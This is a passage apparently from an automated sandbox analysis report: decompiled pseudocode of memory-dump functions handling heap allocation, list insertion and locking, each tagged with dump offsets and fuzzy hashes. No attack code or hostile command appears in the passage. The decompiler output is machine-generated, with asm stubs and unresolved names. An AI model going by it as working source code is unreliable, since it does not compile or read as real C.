            								if(_t87 != _t87) {
            									_t74 = _v12;
            									_t59 = 0;
            									_t79 = _v5;
            									continue;
            								}
            								if(_v6 != 0) {
            									_t74 = _v12;
            									L25:
            									if(_v7 != 0) {
            										if(_t74 < 0x7d0) {
            											if(_v8 == 0) {
            												_t74 = _t74 + 1;
            											}
            										}
            										_t38 = _t90 + 0x14; // 0x0
            										_t39 = _t90 + 0x14; // 0x0
            										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
            										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
            											_t85 = _t85 & 0xff000000;
            										}
            										 *(_t90 + 0x14) = _t85;
            									}
            									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
            									 *((intOrPtr*)(_t90 + 8)) = 1;
            									return 0;
            								}
            								_v5 = 1;
            								_t87 = _t74;
            								goto L19;
            							}
            						}
            						_t94 = _t74;
            						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
            						if(_t74 == 0) {
            							goto L12;
            						} else {
            							_t91 = _t90 + 4;
            							goto L8;
            							L9:
            							while((_t81 & 0x00000001) != 0) {
            								_t69 = _t81;
            								asm("lock cmpxchg [edi], edx");
            								if(_t69 != _t81) {
            									_t81 = _t69;
            									continue;
            								}
            								_t90 = _v16;
            								goto L25;
            							}
            							asm("pause");
            							_t94 = _t94 - 1;
            							if(_t94 != 0) {
            								L8:
            								_t81 =  *_t91;
            								goto L9;
            							} else {
            								_t90 = _v16;
            								_t79 = _v5;
            								goto L12;
            							}
            						}
            					}
            				}
            			}


            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
            • Instruction ID: 306c0ef72e05c5a76d65c2f563ff11bfabb1828bcec3e858b966c28655cb759b
            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
            • Instruction Fuzzy Hash: 53510430E05249EFDF20CF68C1807AFBBB1AF49715F2881AAE54557381D3B5B98AD741
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 84%
            			E044F740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
            				signed short* _v8;
            				intOrPtr _v12;
            				intOrPtr _t55;
            				void* _t56;
            				intOrPtr* _t66;
            				intOrPtr* _t69;
            				void* _t74;
            				intOrPtr* _t78;
            				intOrPtr* _t81;
            				intOrPtr* _t82;
            				intOrPtr _t83;
            				signed short* _t84;
            				intOrPtr _t85;
            				signed int _t87;
            				intOrPtr* _t90;
            				intOrPtr* _t93;
            				intOrPtr* _t94;
            				void* _t98;
            
            				_t84 = __edx;
            				_t80 = __ecx;
            				_push(__ecx);
            				_push(__ecx);
            				_t55 = __ecx;
            				_v8 = __edx;
            				_t87 =  *__edx & 0x0000ffff;
            				_v12 = __ecx;
            				_t3 = _t55 + 0x154; // 0x154
            				_t93 = _t3;
            				_t78 =  *_t93;
            				_t4 = _t87 + 2; // 0x2
            				_t56 = _t4;
            				while(_t78 != _t93) {
            					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
            						L4:
            						_t78 =  *_t78;
            						continue;
            					} else {
            						_t7 = _t78 + 0x18; // 0x18
            						if(E0447D4F0(_t7, _t84[2], _t87) == _t87) {
            							_t40 = _t78 + 0xc; // 0xc
            							_t94 = _t40;
            							_t90 =  *_t94;
            							while(_t90 != _t94) {
            								_t41 = _t90 + 8; // 0x8
            								_t74 = E0446F380(_a4, _t41, 0x10);
            								_t98 = _t98 + 0xc;
            								if(_t74 != 0) {
            									_t90 =  *_t90;
            									continue;
            								}
            								goto L12;
            							}
            							_t82 = L04444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
            							if(_t82 != 0) {
            								_t46 = _t78 + 0xc; // 0xc
            								_t69 = _t46;
            								asm("movsd");
            								asm("movsd");
            								asm("movsd");
            								asm("movsd");
            								_t85 =  *_t69;
            								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
            									L20:
            									_t82 = 3;
            									asm("int 0x29");
            								}
            								 *((intOrPtr*)(_t82 + 4)) = _t69;
            								 *_t82 = _t85;
            								 *((intOrPtr*)(_t85 + 4)) = _t82;
            								 *_t69 = _t82;
            								 *(_t78 + 8) =  *(_t78 + 8) + 1;
            								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
            								goto L11;
            							} else {
            								L18:
            								_push(0xe);
            								_pop(0);
            							}
            						} else {
            							_t84 = _v8;
            							_t9 = _t87 + 2; // 0x2
            							_t56 = _t9;
            							goto L4;
            						}
            					}
            					L12:
            					return 0;
            				}
            				_t10 = _t87 + 0x1a; // 0x1a
            				_t78 = L04444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
            				if(_t78 == 0) {
            					goto L18;
            				} else {
            					_t12 = _t87 + 2; // 0x2
            					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
            					_t16 = _t78 + 0x18; // 0x18
            					E0446F3E0(_t16, _v8[2], _t87);
            					 *((short*)(_t78 + _t87 + 0x18)) = 0;
            					_t19 = _t78 + 0xc; // 0xc
            					_t66 = _t19;
            					 *((intOrPtr*)(_t66 + 4)) = _t66;
            					 *_t66 = _t66;
            					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
            					_t81 = L04444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
            					if(_t81 == 0) {
            						goto L18;
            					} else {
            						_t26 = _t78 + 0xc; // 0xc
            						_t69 = _t26;
            						asm("movsd");
            						asm("movsd");
            						asm("movsd");
            						asm("movsd");
            						_t85 =  *_t69;
            						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
            							goto L20;
            						} else {
            							 *((intOrPtr*)(_t81 + 4)) = _t69;
            							 *_t81 = _t85;
            							 *((intOrPtr*)(_t85 + 4)) = _t81;
            							 *_t69 = _t81;
            							_t83 = _v12;
            							 *(_t78 + 8) = 1;
            							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
            							_t34 = _t83 + 0x154; // 0x1ba
            							_t69 = _t34;
            							_t85 =  *_t69;
            							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
            								goto L20;
            							} else {
            								 *_t78 = _t85;
            								 *((intOrPtr*)(_t78 + 4)) = _t69;
            								 *((intOrPtr*)(_t85 + 4)) = _t78;
            								 *_t69 = _t78;
            								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
            							}
            						}
            						goto L11;
            					}
            				}
            				goto L12;
            			}


            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
            • Instruction ID: b8e3bf0f7cc6aee3bd0ea5233b4b6caf97aa4528b2845b7cb247636ef5564811
            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
            • Instruction Fuzzy Hash: 43518B71600606EFDF25CF54D880A96BBB5FF45308F14C0AAEA089F252E775F986CB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E04454D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
            				signed int _v12;
            				char _v176;
            				char _v177;
            				char _v184;
            				intOrPtr _v192;
            				intOrPtr _v196;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				signed short _t42;
            				char* _t44;
            				intOrPtr _t46;
            				intOrPtr _t50;
            				char* _t57;
            				intOrPtr _t59;
            				intOrPtr _t67;
            				signed int _t69;
            
            				_t64 = __edx;
            				_v12 =  *0x451d360 ^ _t69;
            				_t65 = 0xa0;
            				_v196 = __edx;
            				_v177 = 0;
            				_t67 = __ecx;
            				_v192 = __ecx;
            				E0446FA60( &_v176, 0, 0xa0);
            				_t57 =  &_v176;
            				_t59 = 0xa0;
            				if( *0x4517bc8 != 0) {
            					L3:
            					while(1) {
            						asm("movsd");
            						asm("movsd");
            						asm("movsd");
            						asm("movsd");
            						_t67 = _v192;
            						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
            						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
            						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
            						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
            						_push( &_v184);
            						_push(_t59);
            						_push(_t57);
            						_push(0xa0);
            						_push(_t57);
            						_push(0xf);
            						_t42 = E0446B0B0();
            						if(_t42 != 0xc0000023) {
            							break;
            						}
            						if(_v177 != 0) {
            							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
            						}
            						_v177 = 1;
            						_t44 = L04444620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
            						_t59 = _v184;
            						_t57 = _t44;
            						if(_t57 != 0) {
            							continue;
            						} else {
            							_t42 = 0xc0000017;
            							break;
            						}
            					}
            					if(_t42 != 0) {
            						_t65 = E0442CCC0(_t42);
            						if(_t65 != 0) {
            							L10:
            							if(_v177 != 0) {
            								if(_t57 != 0) {
            									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
            								}
            							}
            							_t46 = _t65;
            							L12:
            							return E0446B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
            						}
            						L7:
            						_t50 = _a4;
            						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
            						if(_t50 != 3) {
            							if(_t50 == 2) {
            								goto L8;
            							}
            							L9:
            							if(E0446F380(_t67 + 0xc, 0x4405138, 0x10) == 0) {
            								 *0x45160d8 = _t67;
            							}
            							goto L10;
            						}
            						L8:
            						_t64 = _t57 + 0x28;
            						E04454F49(_t67, _t57 + 0x28);
            						goto L9;
            					}
            					_t65 = 0;
            					goto L7;
            				}
            				if(E04454E70(0x45186b0, 0x4455690, 0, 0) != 0) {
            					_t46 = E0442CCC0(_t56);
            					goto L12;
            				} else {
            					_t59 = 0xa0;
            					goto L3;
            				}
            			}


            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4829cae3e08543dc9e7270db5501e4e5f39aca143ac7048991e6c58c63c03cb3
            • Instruction ID: 5922af74f158c28682c015b886d845b8824e1438e4932ffa4c8b5f87cc0ca5d1
            • Opcode Fuzzy Hash: 4829cae3e08543dc9e7270db5501e4e5f39aca143ac7048991e6c58c63c03cb3
            • Instruction Fuzzy Hash: 5D419F71A40318AFFF31DF158D80BABB7A9EB45714F00409BED499B292D774BD84CA91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E04463D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
            				intOrPtr _v8;
            				char _v12;
            				signed short** _t33;
            				short* _t38;
            				intOrPtr* _t39;
            				intOrPtr* _t41;
            				signed short _t43;
            				intOrPtr* _t47;
            				intOrPtr* _t53;
            				signed short _t57;
            				intOrPtr _t58;
            				signed short _t60;
            				signed short* _t61;
            
            				_t47 = __ecx;
            				_t61 = __edx;
            				_t60 = ( *__ecx & 0x0000ffff) + 2;
            				if(_t60 > 0xfffe) {
            					L22:
            					return 0xc0000106;
            				}
            				if(__edx != 0) {
            					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
            						L5:
            						E04437B60(0, _t61, 0x44011c4);
            						_v12 =  *_t47;
            						_v12 = _v12 + 0xfff8;
            						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
            						E04437B60(0xfff8, _t61,  &_v12);
            						_t33 = _a8;
            						if(_t33 != 0) {
            							 *_t33 = _t61;
            						}
            						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
            						_t53 = _a12;
            						if(_t53 != 0) {
            							_t57 = _t61[2];
            							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
            							while(_t38 >= _t57) {
            								if( *_t38 == 0x5c) {
            									_t41 = _t38 + 2;
            									if(_t41 == 0) {
            										break;
            									}
            									_t58 = 0;
            									if( *_t41 == 0) {
            										L19:
            										 *_t53 = _t58;
            										goto L7;
            									}
            									 *_t53 = _t41;
            									goto L7;
            								}
            								_t38 = _t38 - 2;
            							}
            							_t58 = 0;
            							goto L19;
            						} else {
            							L7:
            							_t39 = _a16;
            							if(_t39 != 0) {
            								 *_t39 = 0;
            								 *((intOrPtr*)(_t39 + 4)) = 0;
            								 *((intOrPtr*)(_t39 + 8)) = 0;
            								 *((intOrPtr*)(_t39 + 0xc)) = 0;
            							}
            							return 0;
            						}
            					}
            					_t61 = _a4;
            					if(_t61 != 0) {
            						L3:
            						_t43 = L04444620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
            						_t61[2] = _t43;
            						if(_t43 == 0) {
            							return 0xc0000017;
            						}
            						_t61[1] = _t60;
            						 *_t61 = 0;
            						goto L5;
            					}
            					goto L22;
            				}
            				_t61 = _a4;
            				if(_t61 == 0) {
            					return 0xc000000d;
            				}
            				goto L3;
            			}


            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 873787eb706ce1744a2f2b0ba0a57e3d18c7ba2d4154f48189660a0bfe00db1a
            • Instruction ID: fbd1d024cebb536e237f30edc8f57466896f9ca20a629eec010a5c47b2431fca
            • Opcode Fuzzy Hash: 873787eb706ce1744a2f2b0ba0a57e3d18c7ba2d4154f48189660a0bfe00db1a
            • Instruction Fuzzy Hash: AE316D31A056959BEF34CF29C841A6BBBE5EF55700B15806FE84ACB390E730E841D7A2
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 76%
            			E044A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
            				signed int _v8;
            				char _v588;
            				intOrPtr _v592;
            				intOrPtr _v596;
            				signed short* _v600;
            				char _v604;
            				short _v606;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				signed short* _t55;
            				void* _t56;
            				signed short* _t58;
            				signed char* _t61;
            				char* _t68;
            				void* _t69;
            				void* _t71;
            				void* _t72;
            				signed int _t75;
            
            				_t64 = __edx;
            				_t77 = (_t75 & 0xfffffff8) - 0x25c;
            				_v8 =  *0x451d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
            				_t55 = _a16;
            				_v606 = __ecx;
            				_t71 = 0;
            				_t58 = _a12;
            				_v596 = __edx;
            				_v600 = _t58;
            				_t68 =  &_v588;
            				if(_t58 != 0) {
            					_t71 = ( *_t58 & 0x0000ffff) + 2;
            					if(_t55 != 0) {
            						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
            					}
            				}
            				_t8 = _t71 + 0x2a; // 0x28
            				_t33 = _t8;
            				_v592 = _t8;
            				if(_t71 <= 0x214) {
            					L6:
            					 *((short*)(_t68 + 6)) = _v606;
            					if(_t64 != 0xffffffff) {
            						asm("cdq");
            						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
            						 *((char*)(_t68 + 0x28)) = _a4;
            						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
            						 *((char*)(_t68 + 0x29)) = _a8;
            						if(_t71 != 0) {
            							_t22 = _t68 + 0x2a; // 0x2a
            							_t64 = _t22;
            							E044A6B4C(_t58, _t22, _t71,  &_v604);
            							if(_t55 != 0) {
            								_t25 = _v604 + 0x2a; // 0x2a
            								_t64 = _t25 + _t68;
            								E044A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
            							}
            							if(E04447D50() == 0) {
            								_t61 = 0x7ffe0384;
            							} else {
            								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
            							}
            							_push(_t68);
            							_push(_v592 + 0xffffffe0);
            							_push(0x402);
            							_push( *_t61 & 0x000000ff);
            							E04469AE0();
            						}
            					}
            					_t35 =  &_v588;
            					if( &_v588 != _t68) {
            						_t35 = L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
            					}
            					L16:
            					_pop(_t69);
            					_pop(_t72);
            					_pop(_t56);
            					return E0446B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
            				}
            				_t68 = L04444620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
            				if(_t68 == 0) {
            					goto L16;
            				} else {
            					_t58 = _v600;
            					_t64 = _v596;
            					goto L6;
            				}
            			}


            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7deeb427d2d0b1cd7bba1f9570e0115a3bb737c96c48d97a9efcc64106827565
            • Instruction ID: a259295226912a43a4e646dda1b0f738a5820667a34dcda1deae942d3d365259
            • Opcode Fuzzy Hash: 7deeb427d2d0b1cd7bba1f9570e0115a3bb737c96c48d97a9efcc64106827565
            • Instruction Fuzzy Hash: 8731C2726087919BD720DF68C840A6BB3E5BFD8700F044A2EF89587791E730F914C7A6
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E0444C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
            				signed int* _v8;
            				char _v16;
            				void* __ebx;
            				void* __edi;
            				signed char _t33;
            				signed char _t43;
            				signed char _t48;
            				signed char _t62;
            				void* _t63;
            				intOrPtr _t69;
            				intOrPtr _t71;
            				unsigned int* _t82;
            				void* _t83;
            
            				_t80 = __ecx;
            				_t82 = __edx;
            				_t33 =  *((intOrPtr*)(__ecx + 0xde));
            				_t62 = _t33 >> 0x00000001 & 0x00000001;
            				if((_t33 & 0x00000001) != 0) {
            					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
            					if(E04447D50() != 0) {
            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            					} else {
            						_t43 = 0x7ffe0386;
            					}
            					if( *_t43 != 0) {
            						_t43 = E044F8D34(_v8, _t80);
            					}
            					E04442280(_t43, _t82);
            					if( *((char*)(_t80 + 0xdc)) == 0) {
            						E0443FFB0(_t62, _t80, _t82);
            						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
            						_t30 = _t80 + 0xd0; // 0xd0
            						_t83 = _t30;
            						E044F8833(_t83,  &_v16);
            						_t81 = _t80 + 0x90;
            						E0443FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
            						_t63 = 0;
            						_push(0);
            						_push(_t83);
            						_t48 = E0446B180();
            						if(_a4 != 0) {
            							E04442280(_t48, _t81);
            						}
            					} else {
            						_t69 = _v8;
            						_t12 = _t80 + 0x98; // 0x98
            						_t13 = _t69 + 0xc; // 0x575651ff
            						E0444BB2D(_t13, _t12);
            						_t71 = _v8;
            						_t15 = _t80 + 0xb0; // 0xb0
            						_t16 = _t71 + 8; // 0x8b000cc2
            						E0444BB2D(_t16, _t15);
            						E0444B944(_v8, _t62);
            						 *((char*)(_t80 + 0xdc)) = 0;
            						E0443FFB0(0, _t80, _t82);
            						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
            						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
            						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
            						 *(_t80 + 0xde) = 0;
            						if(_a4 == 0) {
            							_t25 = _t80 + 0x90; // 0x90
            							E0443FFB0(0, _t80, _t25);
            						}
            						_t63 = 1;
            					}
            					return _t63;
            				}
            				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
            				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
            				if(_a4 == 0) {
            					_t24 = _t80 + 0x90; // 0x90
            					E0443FFB0(0, __ecx, _t24);
            				}
            				return 0;
            			}


            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
            • Instruction ID: 3a992ddb0dd1422d2535be8251309f7ab0f7158cd4e9cb4d370e9e0baf75540c
            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
            • Instruction Fuzzy Hash: CC31C271A06586AAFF04EBB5C480BEAF754BF86208F08415FD51847242DB747A4ADBA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E04468EC7(void* __ecx, void* __edx) {
            				signed int _v8;
            				signed int* _v16;
            				intOrPtr _v20;
            				signed int* _v24;
            				char* _v28;
            				signed int* _v32;
            				intOrPtr _v36;
            				signed int* _v40;
            				signed int* _v44;
            				signed int* _v48;
            				intOrPtr _v52;
            				signed int* _v56;
            				signed int* _v60;
            				signed int* _v64;
            				intOrPtr _v68;
            				signed int* _v72;
            				char* _v76;
            				signed int* _v80;
            				signed int _v84;
            				signed int* _v88;
            				intOrPtr _v92;
            				signed int* _v96;
            				intOrPtr _v100;
            				signed int* _v104;
            				signed int* _v108;
            				char _v140;
            				signed int _v144;
            				signed int _v148;
            				signed int* _v152;
            				char _v156;
            				signed int* _v160;
            				char _v164;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t67;
            				intOrPtr _t70;
            				void* _t71;
            				void* _t72;
            				signed int _t73;
            
            				_t69 = __edx;
            				_v8 =  *0x451d360 ^ _t73;
            				_t48 =  *[fs:0x30];
            				_t72 = __edx;
            				_t71 = __ecx;
            				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
            					_t48 = E04454E70(0x45186e4, 0x4469490, 0, 0);
            					if( *0x45153e8 > 5 && E04468F33(0x45153e8, 0, 0x2000) != 0) {
            						_v156 =  *((intOrPtr*)(_t71 + 0x44));
            						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
            						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
            						_v164 =  *((intOrPtr*)(_t72 + 0x58));
            						_v108 =  &_v84;
            						_v92 =  *((intOrPtr*)(_t71 + 0x28));
            						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
            						_v76 =  &_v156;
            						_t70 = 8;
            						_v60 =  &_v144;
            						_t67 = 4;
            						_v44 =  &_v148;
            						_v152 = 0;
            						_v160 = 0;
            						_v104 = 0;
            						_v100 = 2;
            						_v96 = 0;
            						_v88 = 0;
            						_v80 = 0;
            						_v72 = 0;
            						_v68 = _t70;
            						_v64 = 0;
            						_v56 = 0;
            						_v52 = 0x45153e8;
            						_v48 = 0;
            						_v40 = 0;
            						_v36 = 0x45153e8;
            						_v32 = 0;
            						_v28 =  &_v164;
            						_v24 = 0;
            						_v20 = _t70;
            						_v16 = 0;
            						_t69 = 0x440bc46;
            						_t48 = E044A7B9C(0x45153e8, 0x440bc46, _t67, 0x45153e8, _t70,  &_v140);
            					}
            				}
            				return E0446B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
            			}


            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e5f2339a1ebd07e90fb50a8ae6349efd50938d1b7d6e8a49511a263467815279
            • Instruction ID: 415532ee3f4a3eb29d07dfcd33816a1c7870c9ab395e5a471c5e2954f41b3f5f
            • Opcode Fuzzy Hash: e5f2339a1ebd07e90fb50a8ae6349efd50938d1b7d6e8a49511a263467815279
            • Instruction Fuzzy Hash: A94192B1D002189FEB24DFAAD981AADFBF4FB48314F5041AFE509A7241E7746A84CF51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 74%
            			E0445E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
            				intOrPtr* _v0;
            				signed char _v4;
            				signed int _v8;
            				void* __ecx;
            				void* __ebp;
            				void* _t37;
            				intOrPtr _t38;
            				signed int _t44;
            				signed char _t52;
            				void* _t54;
            				intOrPtr* _t56;
            				void* _t58;
            				char* _t59;
            				signed int _t62;
            
            				_t58 = __edx;
            				_push(0);
            				_push(4);
            				_push( &_v8);
            				_push(0x24);
            				_push(0xffffffff);
            				if(E04469670() < 0) {
            					L0447DF30(_t54, _t58, _t35);
            					asm("int3");
            					asm("int3");
            					asm("int3");
            					asm("int3");
            					asm("int3");
            					asm("int3");
            					_push(_t54);
            					_t52 = _v4;
            					if(_t52 > 8) {
            						_t37 = 0xc0000078;
            					} else {
            						_t38 =  *0x4517b9c; // 0x0
            						_t62 = _t52 & 0x000000ff;
            						_t59 = L04444620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
            						if(_t59 == 0) {
            							_t37 = 0xc0000017;
            						} else {
            							_t56 = _v0;
            							 *(_t59 + 1) = _t52;
            							 *_t59 = 1;
            							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
            							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
            							_t44 = _t62 - 1;
            							if(_t44 <= 7) {
            								switch( *((intOrPtr*)(_t44 * 4 +  &M0445E810))) {
            									case 0:
            										L6:
            										 *((intOrPtr*)(_t59 + 8)) = _a8;
            										goto L7;
            									case 1:
            										L13:
            										 *((intOrPtr*)(__edx + 0xc)) = _a12;
            										goto L6;
            									case 2:
            										L12:
            										 *((intOrPtr*)(__edx + 0x10)) = _a16;
            										goto L13;
            									case 3:
            										L11:
            										 *((intOrPtr*)(__edx + 0x14)) = _a20;
            										goto L12;
            									case 4:
            										L10:
            										 *((intOrPtr*)(__edx + 0x18)) = _a24;
            										goto L11;
            									case 5:
            										L9:
            										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
            										goto L10;
            									case 6:
            										L17:
            										 *((intOrPtr*)(__edx + 0x20)) = _a32;
            										goto L9;
            									case 7:
            										 *((intOrPtr*)(__edx + 0x24)) = _a36;
            										goto L17;
            								}
            							}
            							L7:
            							 *_a40 = _t59;
            							_t37 = 0;
            						}
            					}
            					return _t37;
            				} else {
            					_push(0x20);
            					asm("ror eax, cl");
            					return _a4 ^ _v8;
            				}
            			}


            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3be6ba6a360a6cfb33cdddf7a2ff42bce428ede60c5f6a3f7b3f274a5fbea737
            • Instruction ID: ee78e1d09777df22c4da9de7b275349337dd963c94d055a0ad941d37d4dd61b3
            • Opcode Fuzzy Hash: 3be6ba6a360a6cfb33cdddf7a2ff42bce428ede60c5f6a3f7b3f274a5fbea737
            • Instruction Fuzzy Hash: EC318E75A14249EFEB44CF28D840B96BBE4FB08314F14825AF904CB352E631ED80CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 67%
            			E0445BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				void* __ebx;
            				void* __edi;
            				intOrPtr _t22;
            				intOrPtr* _t41;
            				intOrPtr _t51;
            
            				_t51 =  *0x4516100; // 0x35
            				_v12 = __edx;
            				_v8 = __ecx;
            				if(_t51 >= 0x800) {
            					L12:
            					return 0;
            				} else {
            					goto L1;
            				}
            				while(1) {
            					L1:
            					_t22 = _t51;
            					asm("lock cmpxchg [ecx], edx");
            					if(_t51 == _t22) {
            						break;
            					}
            					_t51 = _t22;
            					if(_t22 < 0x800) {
            						continue;
            					}
            					goto L12;
            				}
            				E04442280(0xd, 0x1596f1a0);
            				_t41 =  *0x45160f8; // 0x0
            				if(_t41 != 0) {
            					 *0x45160f8 =  *_t41;
